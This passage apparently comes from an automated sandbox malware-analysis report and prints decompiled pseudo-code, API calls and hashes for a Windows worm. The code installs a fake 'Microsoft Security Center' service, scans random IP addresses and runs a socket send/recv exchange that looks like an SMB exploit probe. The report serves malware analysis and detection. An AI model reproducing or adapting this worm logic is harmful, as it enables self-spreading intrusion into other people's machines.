            • send.WS2_32(?,?,00001052,00000000), ref: 0040717A
            • recv.WS2_32(?,?,00001000,00000000), ref: 00407194
            • htons.WS2_32(?), ref: 004071D3
            • send.WS2_32(?,?,?,00000000), ref: 00407268
            • recv.WS2_32(?,?,00001000,00000000), ref: 00407282
            • GlobalFree.KERNEL32 ref: 0040728C
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Globalrecvsend$AllocFreehtons
            • String ID: R$XB
            • API String ID: 2499408064-887094464
            • Opcode ID: a889ab95c7702b96a90eebd94a048c396ca20449bf3ff93c22cb7b9eff7d00f1
            • Instruction ID: 4c1efdbd1725d41cac0ffbde0867fe990468cc20af3f1bbb6c1bd8f9cce8fdf0
            • Opcode Fuzzy Hash: a889ab95c7702b96a90eebd94a048c396ca20449bf3ff93c22cb7b9eff7d00f1
            • Instruction Fuzzy Hash: 929151716083458BD724CF25C84069BB7E1FFC8704F444A3EFA99A7381D778AA09CB5A
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E00407C40() {
            				char _v260;
            				void* _t15;
            				void* _t17;
            
            				sprintf( &_v260, "%s -m security", 0x70f760);
            				_t15 = OpenSCManagerA(0, 0, 0xf003f);
            				if(_t15 == 0) {
            					return 0;
            				} else {
            					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
            					if(_t17 != 0) {
            						StartServiceA(_t17, 0, 0);
            						CloseServiceHandle(_t17);
            					}
            					CloseServiceHandle(_t15);
            					return 0;
            				}
            			}

            APIs
            • sprintf.MSVCRT ref: 00407C56
            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
            • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FD8FB10,00000000), ref: 00407C9B
            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
            • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
            • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
            • API String ID: 3340711343-4063779371
            • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
            • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
            • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
            • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E00408090() {
            				char* _v4;
            				char* _v8;
            				intOrPtr _v12;
            				struct _SERVICE_TABLE_ENTRY _v16;
            				long _t6;
            				void* _t19;
            				void* _t22;
            
            				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
            				__imp____p___argc();
            				_t26 =  *_t6 - 2;
            				if( *_t6 >= 2) {
            					_t19 = OpenSCManagerA(0, 0, 0xf003f);
            					__eflags = _t19;
            					if(_t19 != 0) {
            						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
            						__eflags = _t22;
            						if(_t22 != 0) {
            							E00407FA0(_t22, 0x3c);
            							CloseServiceHandle(_t22);
            						}
            						CloseServiceHandle(_t19);
            					}
            					_v16 = "mssecsvc2.0";
            					_v12 = E00408000;
            					_v8 = 0;
            					_v4 = 0;
            					return StartServiceCtrlDispatcherA( &_v16);
            				} else {
            					return E00407F20(_t26);
            				}
            			}

            APIs
            • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
            • __p___argc.MSVCRT ref: 004080A5
            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
            • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6FD8FB10,00000000,?,004081B2), ref: 004080DC
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
            • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
            • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
            • String ID: mssecsvc2.0
            • API String ID: 4274534310-3729025388
            • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
            • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
            • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
            • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00407660() {
            				BYTE* _t7;
            
            				if( *0x70f870 != 0) {
            					EnterCriticalSection(0x431418);
            					CryptGenRandom( *0x70f870, 4, _t7);
            					LeaveCriticalSection(0x431418);
            					return  *_t7;
            				} else {
            					return rand();
            				}
            			}

            APIs
            • rand.MSVCRT ref: 0040766A
            • EnterCriticalSection.KERNEL32(00431418), ref: 00407677
            • CryptGenRandom.ADVAPI32(?,00000004,00000000), ref: 0040768B
            • LeaveCriticalSection.KERNEL32(00431418), ref: 00407696
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CriticalSection$CryptEnterLeaveRandomrand
            • String ID:
            • API String ID: 2546132801-0
            • Opcode ID: c0ac807a879424b57b2593f61ffd835e3bddb04690acba1e13808fb65da8fefa
            • Instruction ID: 79280cadd07851808ca7e30a6006644a6cb4e0e15ada81f4a163105091244b64
            • Opcode Fuzzy Hash: c0ac807a879424b57b2593f61ffd835e3bddb04690acba1e13808fb65da8fefa
            • Instruction Fuzzy Hash: A0E04670200305EBC7149F68ED08F9637A8FB88312B108039F542D21A0DB38D4108B2F
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E00407620() {
            				int _t4;
            				signed int _t6;
            
            				_t6 = 0;
            				while(1) {
            					asm("sbb eax, eax");
            					_t4 = CryptAcquireContextA(0x70f870, 0,  ~_t6 & "Microsoft Base Cryptographic Provider v1.0", 1, 0xf0000000);
            					if(_t4 != 0) {
            						break;
            					}
            					_t6 = _t6 + 1;
            					if(_t6 < 2) {
            						continue;
            					}
            					break;
            				}
            				InitializeCriticalSection(0x431418);
            				return _t4;
            			}

            APIs
            • CryptAcquireContextA.ADVAPI32(0070F870,00000000,00000000,00000001,F0000000), ref: 00407644
            • InitializeCriticalSection.KERNEL32(00431418), ref: 00407655
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: AcquireContextCriticalCryptInitializeSection
            • String ID:
            • API String ID: 1845266067-0
            • Opcode ID: 9601f4eae6ca377f6814d4b8d706f325617b2b0623dd4cff3c79478e8e2586aa
            • Instruction ID: bf0ae1558cdef70b38d16702ada48a22b4e05866b10c127fd1ad32b4c00b0ea1
            • Opcode Fuzzy Hash: 9601f4eae6ca377f6814d4b8d706f325617b2b0623dd4cff3c79478e8e2586aa
            • Instruction Fuzzy Hash: 30E02B32B8073465D620163D6C06FD345C8C7BCF75F121132FA02F20D0D1A9D84241EE
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 86%
            			E00407840(intOrPtr _a4) {
            				char _v260;
            				char _v264;
            				signed int _v268;
            				signed int _v272;
            				intOrPtr _v276;
            				intOrPtr _v280;
            				intOrPtr _v284;
            				void* _t41;
            				long _t42;
            				int _t56;
            				void* _t57;
            				int _t61;
            				void* _t62;
            				intOrPtr _t70;
            				signed int _t71;
            				long _t90;
            				intOrPtr _t91;
            				int _t93;
            				void* _t95;
            				signed int _t98;
            				void* _t101;
            
            				_t70 = 1;
            				_v280 = 1;
            				_v276 = 1;
            				_t90 = GetTickCount();
            				__imp__time( &_v264);
            				_t41 = GetCurrentThread();
            				_t42 = GetCurrentThreadId();
            				srand(GetTickCount() + _v264 + _t41 + _t42);
            				_t98 = _v268;
            				_t101 =  &_v280 + 8;
            				L1:
            				while(1) {
            					L1:
            					if(GetTickCount() - _t90 > 0x249f00) {
            						_v280 = _t70;
            					}
            					if(GetTickCount() - _t90 > 0x124f80) {
            						_v276 = _t70;
            					}
            					if(_v280 == 0 || _a4 >= 0x20) {
            						goto L9;
            					}
            					_t98 = E00407660() % 0xff;
            					if(_t98 == 0x7f || _t98 >= 0xe0) {
            						continue;
            					}
            					L9:
            					if(_v276 != 0 && _a4 < 0x20) {
            						_v272 = E00407660() % 0xff;
            					}
            					_t71 = E00407660() % 0xff;
            					_t56 = sprintf( &_v260, "%d.%d.%d.%d", _t98, _v272, _t71, E00407660() % 0xff);
            					_push( &_v260);
            					L004097D4();
            					_t57 = E00407480(_t56);
            					_t101 = _t101 + 0x1c;
            					if(_t57 <= 0) {
            						L22:
            						Sleep(0x64);
            						_t70 = 1;
            						continue;
            					} else {
            						_v284 = 0;
            						_v280 = 0;
            						_v272 = GetTickCount();
            						_t91 = 1;
            						do {
            							_t61 = sprintf( &_v264, "%d.%d.%d.%d", _t98, _v276, _t71, _t91);
            							_push( &_v264);
            							L004097D4();
            							_t93 = _t61;
            							_t62 = E00407480(_t93);
            							_t101 = _t101 + 0x1c;
            							if(_t62 <= 0) {
            								L19:
            								Sleep(0x32);
            								goto L20;
            							}
            							__imp___beginthreadex(0, 0, E00407540, _t93, 0, 0);
            							_t95 = _t62;
            							_t101 = _t101 + 0x18;
            							if(_t95 == 0) {
            								goto L20;
            							}
            							if(WaitForSingleObject(_t95, 0x36ee80) == 0x102) {
            								TerminateThread(_t95, 0);
            							}
            							CloseHandle(_t95);
            							goto L19;
            							L20:
            							_t91 = _t91 + 1;
            						} while (_t91 < 0xff);
            						_t90 = _v276;
            						goto L22;
            					}
            				}
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CountTick$Thread$CurrentSleepinet_addrsprintf$CloseHandleObjectSingleTerminateWait_beginthreadexsrandtime
            • String ID: $%d.%d.%d.%d
            • API String ID: 4176435924-479890864
            • Opcode ID: f363e766c160667d018656684faa2d49ba2bc9810b5ba48cecf977b80b72a8e1
            • Instruction ID: f124348fcd1d090d882ca1a3a3b8ac5e7e4d7abd695b8a166d734543007768a5
            • Opcode Fuzzy Hash: f363e766c160667d018656684faa2d49ba2bc9810b5ba48cecf977b80b72a8e1
            • Instruction Fuzzy Hash: 7341E371E083055BE310AF75DD49B6B76D9AF88304F04483FF549F2291D67CE9148A9B
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 53%
            			E00401370(void* __ecx, char* __edx, void* __eflags, signed long long __fp0, char _a1, char _a2, char _a3, signed char _a4, int _a8, char _a12, int _a16, int _a24, signed long long _a28, int _a40, void* _a44, void* _a48, long _a52, int _a56, char _a64, void* _a66, void* _a72, void* _a80, void* _a88, void* _a96, char _a108, void* _a109, void* _a112, void* _a113, void* _a2144, void* _a2152, void* _a12156) {
            				char _v0;
            				void* _v4;
            				void* _v8;
            				void* _v10;
            				void* _v12;
            				void* _v33;
            				void* _v34;
            				void* _v35;
            				void* _v36;
            				intOrPtr* _t77;
            				signed char _t80;
            				short _t82;
            				void* _t85;
            				void* _t89;
            				char* _t95;
            				intOrPtr _t127;
            				void* _t131;
            				intOrPtr* _t135;
            				void* _t137;
            				void* _t140;
            				void* _t141;
            				signed long long _t152;
            				signed long long _t153;
            
            				_t119 = __edx;
            				E00409860(0x2f84, __ecx);
            				_v0 = 0;
            				_a1 = 8;
            				_a2 = 0;
            				_a3 = 8;
            				_a4 = GetTickCount();
            				_a8 = 0;
            				asm("fild qword [esp+0x14]");
            				_a28 = __fp0;
            				E00401D80();
            				_t77 =  *0x43146c; // 0x0
            				E004082C0(0x431468,  &_a4,  *_t77, _t77);
            				_t135 = 0x431480;
            				do {
            					_t152 =  *(_t135 + 0x2720) *  *0x40a190;
            					 *(_t137 + 0x5c) = _t152;
            					_t80 = GetTickCount();
            					_a4 = _t80;
            					_a8 = 0;
            					asm("fild qword [esp+0x14]");
            					_t153 = _t152 - _a28;
            					asm("fsubr qword [esp+0x5c]");
            					asm("fcom qword [0x40a188]");
            					asm("fnstsw ax");
            					if((_t80 & 0x00000041) != 0) {
            						st0 = _t153;
            					} else {
            						_t153 = _t153 *  *0x40a190;
            						L00409890();
            						E00401660(_t80, _t119);
            						_t137 = _t137 + 8;
            					}
            					_a52 = GetTickCount();
            					_t82 =  *_t135;
            					_a56 = 0;
            					asm("fild qword [esp+0x44]");
            					_a28 = _t153;
            					if(_t82 != 2) {
            						__eflags = _t82 - 3;
            						if(_t82 != 3) {
            							__eflags = _t82;
            							if(__eflags != 0) {
            								__eflags = _t82 - 1;
            								if(_t82 != 1) {
            									goto L20;
            								} else {
            									_t54 = _t135 + 4; // 0x0
            									_push( &_a12);
            									_push(_t137 + 0x54);
            									_a12 =  *_t54;
            									_a16 = 0;
            									E00408390();
            									_push(0);
            									_t82 =  &_a108;
            									_push(0x800);
            									_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x54)) + 0x10));
            									_push(_t82);
            									_push( *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x54)) + 0x10)));
            									L004097B6();
            									__eflags = _t82 - 0xffffffff;
            									if(_t82 == 0xffffffff) {
            										goto L24;
            									} else {
            										__eflags =  *((intOrPtr*)(_t135 + 8)) - 3;
            										if( *((intOrPtr*)(_t135 + 8)) > 3) {
            											_t63 = _t135 + 0xc; // 0x43148c
            											_t131 = _t63;
            											__imp___stricmp(_t131, "treeid");
            											_t140 = _t137 + 8;
            											__eflags = _t82;
            											if(_t82 == 0) {
            												_t82 =  *((intOrPtr*)(_t140 + 0xa0));
            												 *((char*)(_t140 + 0x12)) = _t82;
            												 *((char*)(_t140 + 0x13)) =  *((intOrPtr*)(_t140 + 0xa1));
            											}
            											__imp___stricmp(_t131, "userid");
            											_t137 = _t140 + 8;
            											__eflags = _t82;
            											if(_t82 == 0) {
            												_t119 =  *((intOrPtr*)(_t137 + 0xa4));
            												_t82 =  *((intOrPtr*)(_t137 + 0xa5));
            												 *((char*)(_t137 + 0x10)) =  *((intOrPtr*)(_t137 + 0xa4));
            												 *((char*)(_t137 + 0x11)) = _t82;
            											}
            										}
            										goto L20;
            									}
            								}
            							} else {
            								memset(_t137 + 0x884, 0, 0x9c4 << 2);
            								_t141 = _t137 + 0xc;
            								_push( &_a2);
            								_t44 = _t135 + 8; // 0x0
            								_push( &_v0);
            								_push(_t141 + 0x884);
            								_t45 = _t135 + 0xc; // 0x43148c
            								_push( *_t44);
            								_t89 = E00401190(__eflags);
            								_t137 = _t141 + 0x14;
            								_t47 = _t135 + 4; // 0x0
            								_push(_t137 + 0x34);
            								_push(_t137 + 0x74);
            								 *((intOrPtr*)(_t137 + 0x3c)) =  *_t47;
            								_a40 = 0;
            								E00408390();
            								_push(0);
            								_t82 = _t137 + 0x888;
            								_push(_t89);
            								_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x74)) + 0x10));
            								_push(_t82);
            								_push( *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x74)) + 0x10)));
            								L004097BC();
            								__eflags = _t82 - 0xffffffff;
            								if(_t82 == 0xffffffff) {
            									goto L24;
            								} else {
            									goto L20;
            								}
            							}
            						} else {
            							_t32 = _t135 + 4; // 0x0
            							_push(_t137 + 0x24);
            							_push( &_a108);
            							 *((intOrPtr*)(_t137 + 0x2c)) =  *_t32;
            							_a24 = 0;
            							E00408390();
            							_t119 =  *((intOrPtr*)(_t137 + 0x7c));
            							_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x7c)) + 0x10));
            							_push(_t82);
            							L004097B0();
            							goto L20;
            						}
            					} else {
            						 *((short*)(_t137 + 0x64)) = _t82;
            						_push( *((intOrPtr*)(_t137 + 0x2f98)));
            						L004097D4();
            						 *((intOrPtr*)(_t137 + 0x68)) = _t82;
            						_push( *((intOrPtr*)(_t137 + 0x2f9c)));
            						L004097CE();
            						_push(0);
            						_push(1);
            						_push(2);
            						 *((short*)(_t137 + 0x72)) = _t82;
            						L004097C8();
            						_t127 = _t82;
            						if(_t127 == 0xffffffff) {
            							return E00401310();
            						} else {
            							_t95 =  &_a64;
            							_push(0x10);
            							_push(_t95);
            							_push(_t127);
            							L004097C2();
            							if(_t95 == 0xffffffff) {
            								_push(_t127);
            								L004097B0();
            								L24:
            								_t85 = E00401310();
            								Sleep(0x3e8);
            								return _t85;
            							} else {
            								_t25 = _t135 + 4; // 0x0
            								_t119 =  &_a12;
            								_a12 =  *_t25;
            								_push( &_a12);
            								_push( &_a28);
            								_a16 = 0;
            								_t82 = E00408390();
            								 *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x4c)) + 0x10)) = _t127;
            								goto L20;
            							}
            						}
            					}
            					L25:
            					L20:
            					_t135 = _t135 + 0x2728;
            				} while (_t135 < 0x5ffd08);
            				return _t82;
            				goto L25;
            			}

            APIs
            • GetTickCount.KERNEL32 ref: 00401398
            • GetTickCount.KERNEL32 ref: 004013DC
            • _ftol.MSVCRT ref: 00401405
              • Part of subcall function 00401660: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00401677
              • Part of subcall function 00401660: __allrem.LIBCMT ref: 00401687
              • Part of subcall function 00401660: Sleep.KERNEL32(?,?,?,000F4240,00000000,?,?,000F4240,00000000,?,00431480,00000000), ref: 004016BE
            • GetTickCount.KERNEL32 ref: 00401418
            • inet_addr.WS2_32(?), ref: 00401440
            • htons.WS2_32(?), ref: 00401451
            • socket.WS2_32(00000002,00000001,00000000), ref: 00401460
            • connect.WS2_32(00000000,?,00000010), ref: 00401478
            • closesocket.WS2_32(?), ref: 004014DE
            • send.WS2_32(?,?,00000000,00000000), ref: 00401552
            • closesocket.WS2_32(00000000), ref: 0040163B
              • Part of subcall function 00401310: closesocket.WS2_32(?), ref: 00401320
            • Sleep.KERNEL32(000003E8,?,?,?,00000000), ref: 0040164A
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: CountTickclosesocket$Sleep$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@_ftolconnecthtonsinet_addrsendsocket
            • String ID: treeid$userid
            • API String ID: 1627863558-1952904777
            • Opcode ID: a795f5ef80919ddeb185117022999ef12c76f4afe28dc9b1c1f32bf7cae1b72b
            • Instruction ID: 9576392e324d7e05cb18ae900f54aa0921aaa15026424fab799db75fbc2103f8
            • Opcode Fuzzy Hash: a795f5ef80919ddeb185117022999ef12c76f4afe28dc9b1c1f32bf7cae1b72b
            • Instruction Fuzzy Hash: 1981BF715083429FD314DF65C8809ABB7E8AFC8704F008D3EF5D5A32A1DA399909CB6B
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 206 401b70-401bc8 inet_addr htons socket 207 401d68-401d73 206->207 208 401bce-401bde connect 206->208 209 401d62-401d63 closesocket 208->209 210 401be4-401bf9 send 208->210 209->207 210->209 211 401bff-401c14 recv 210->211 211->209 212 401c1a-401c2f send 211->212 212->209 213 401c35-401c4a recv 212->213 213->209 214 401c50-401c7a send 213->214 214->209 215 401c80-401c95 recv 214->215 215->209 216 401c9b-401cd0 send 215->216 216->209 217 401cd6-401ceb recv 216->217 217->209 218 401ced-401cf2 217->218 218->209 219 401cf4-401cfd 218->219 220 401d4d-401d61 closesocket 219->220 221 401cff-401d34 send 219->221 221->209 222 401d36-401d4b recv 221->222 222->209 222->220
            C-Code - Quality: 47%
            			E00401B70(short _a4, intOrPtr _a8) {
            				intOrPtr _v152;
            				void _v1023;
            				char _v1024;
            				short _v1040;
            				short _v1046;
            				char _v1060;
            				char _v1072;
            				char _v1087;
            				char _v1088;
            				char _v1104;
            				char _v1123;
            				char _v1124;
            				char _v1136;
            				char _v1137;
            				char _v1150;
            				char _v1168;
            				char _v1169;
            				char _v1200;
            				short _t25;
            				char* _t27;
            				char _t28;
            				char _t29;
            				char _t30;
            				char* _t31;
            				intOrPtr _t32;
            				char _t34;
            				short _t46;
            
            				_v1024 = 0;
            				_v1040 = 2;
            				memset( &_v1023, 0, 0xff << 2);
            				asm("stosw");
            				asm("stosb");
            				_t25 = _a4;
            				_push(_t25);
            				L004097D4();
            				_v1040 = _t25;
            				_push(_a8);
            				L004097CE();
            				_push(0);
            				_push(1);
            				_push(2);
            				_v1046 = _t25;
            				L004097C8();
            				_t46 = _t25;
            				if(_t46 == 0xffffffff) {
            					L16:
            					return 0;
            				} else {
            					_push(0x10);
            					_push( &_v1060);
            					_push(_t46);
            					L004097C2();
            					if(_t25 == 0xffffffff) {
            						L15:
            						_push(_t46);
            						L004097B0();
            						goto L16;
            					} else {
            						_push(0);
            						_push(0x89);
            						_push(0x42e544);
            						_push(_t46);
            						L004097BC();
            						if(_t25 == 0xffffffff) {
            							goto L15;
            						} else {
            							_push(0);
            							_t27 =  &_v1072;
            							_push(0x400);
            							_push(_t27);
            							_push(_t46);
            							L004097B6();
            							if(_t27 == 0xffffffff) {
            								goto L15;
            							} else {
            								_push(0);
            								_push(0x8c);
            								_push(0x42e5d0);
            								_push(_t46);
            								L004097BC();
            								if(_t27 == 0xffffffff) {
            									goto L15;
            								} else {
            									_push(0);
            									_push(0x400);
            									_push( &_v1104);
            									_push(_t46);
            									L004097B6();
            									if(_t27 == 0xffffffff) {
            										goto L15;
            									} else {
            										_t28 = _v1088;
            										_push(0);
            										_t34 = _t28;
            										 *0x42e67c = _t28;
            										_t29 = _v1087;
            										_push(0x60);
            										_push(0x42e65c);
            										_push(_t46);
            										_v1137 = _t29;
            										 *0x42e67d = _t29;
            										L004097BC();
            										if(_t29 == 0xffffffff) {
            											goto L15;
            										} else {
            											_push(0);
            											_push(0x400);
            											_push( &_v1136);
            											_push(_t46);
            											L004097B6();
            											if(_t29 == 0xffffffff) {
            												goto L15;
            											} else {
            												_t30 = _v1124;
            												_push(0);
            												_push(0x52);
            												_push(0x42e6bc);
            												_push(_t46);
            												 *0x42e6d8 = _t30;
            												 *0x42e6d9 = _v1123;
            												 *0x42e6dc = _t34;
            												 *0x42e6dd = _v1169;
            												L004097BC();
            												if(_t30 == 0xffffffff) {
            													goto L15;
            												} else {
            													_push(0);
            													_t31 =  &_v1168;
            													_push(0x400);
            													_push(_t31);
            													_push(_t46);
            													L004097B6();
            													if(_t31 == 0xffffffff || _v1150 != 0x51) {
            														goto L15;
            													} else {
            														_t32 = _v152;
            														if(_t32 != 0) {
            															L14:
            															_push(_t46);
            															L004097B0();
            															return 1;
            														} else {
            															_push(0);
            															_push(0x52);
            															_push(0x42e6bc);
            															_push(_t46);
            															 *0x42e6de = 0x42;
            															 *0x42e6ed = 0xe;
            															 *0x42e6ee = 0x69;
            															 *0x42e6ef = 0;
            															 *0x42e6f0 = 0;
            															L004097BC();
            															if(_t32 == 0xffffffff) {
            																goto L15;
            															} else {
            																_push(0);
            																_push(0x400);
            																_push( &_v1200);
            																_push(_t46);
            																L004097B6();
            																if(_t32 == 0xffffffff) {
            																	goto L15;
            																} else {
            																	goto L14;
            																}
            															}
            														}
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            			}

            APIs
            • inet_addr.WS2_32(?), ref: 00401B9D
            • htons.WS2_32(?), ref: 00401BAE
            • socket.WS2_32(00000002,00000001,00000000), ref: 00401BBE
            • connect.WS2_32(00000000,00000002,00000010), ref: 00401BD6
            • send.WS2_32(00000000,0042E544,00000089,00000000), ref: 00401BF1
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C0C
            • send.WS2_32(00000000,0042E5D0,0000008C,00000000), ref: 00401C27
